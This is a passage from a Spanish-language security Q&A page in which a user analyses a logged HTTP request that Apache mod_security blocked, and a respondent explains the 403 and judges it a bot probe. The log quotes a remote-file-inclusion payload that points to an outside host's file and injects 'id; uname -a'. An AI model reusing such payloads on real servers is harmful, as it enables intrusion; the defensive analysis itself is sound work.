Análisis de registro de Wireshark

Navega tus respuestas
1

Tengo el siguiente registro de Wireshark y quiero categorizar el ataque. Creo que imprime el usuario bajo las ejecuciones de apache y luego imprime la información del sistema. ¿De este registro podemos determinar si el ataque fue exitoso? En mi opinión, no fue por el apache's mod-security . 

Request: 200.158.8.207-- [19/Jan/2012:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
POST lindex.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: '/'
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "unamelx20-a" at
POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz. p5. org. uk/lila.jpg?&cmd=cd /Imp; id; lsuname -a
    
pregunta glarkou 28.02.2012 - 20:26
fuente

1 respuesta

6

mod_security envió al usuario una respuesta HTTP 403, que significa (citado de RFC 2616 ) :

  

El servidor entendió la solicitud, pero se niega a cumplirla. La autorización no ayudará y la solicitud NO DEBE repetirse. Si el método de solicitud no era HEAD y el servidor desea hacer público el motivo por el cual la solicitud no se ha cumplido, DEBE describir el motivo de la denegación en la entidad. Si el servidor no desea que esta información esté disponible para el cliente, se puede usar el código de estado 404 (No encontrado) en su lugar.

El motivo de este bloque es que coincide con el patrón "uname -a", que es un comando de Unix para devolver información del sistema. Aquí hay un ejemplo de salida de dicho comando:

  

Linux k4rrax 2.6.35-32-generic # 64-Ubuntu SMP lun 2 de enero 23:31:33 UTC 2012 i686 GNU / Linux

Este "ataque" es probablemente solo un scriptkiddie o bot aleatorio que intenta ver si puede explotarte de alguna manera. Es muy comúnmente visto en internet. La dirección IP de origen ya está en la lista negra en varios lugares: enlace

    
respondido por el Chris Dale 28.02.2012 - 20:38
fuente

Lea otras preguntas en las etiquetas

Lista de brechas de seguridad notables [cerrado] Se está renombrando el acceso directo del escritorio de Firefox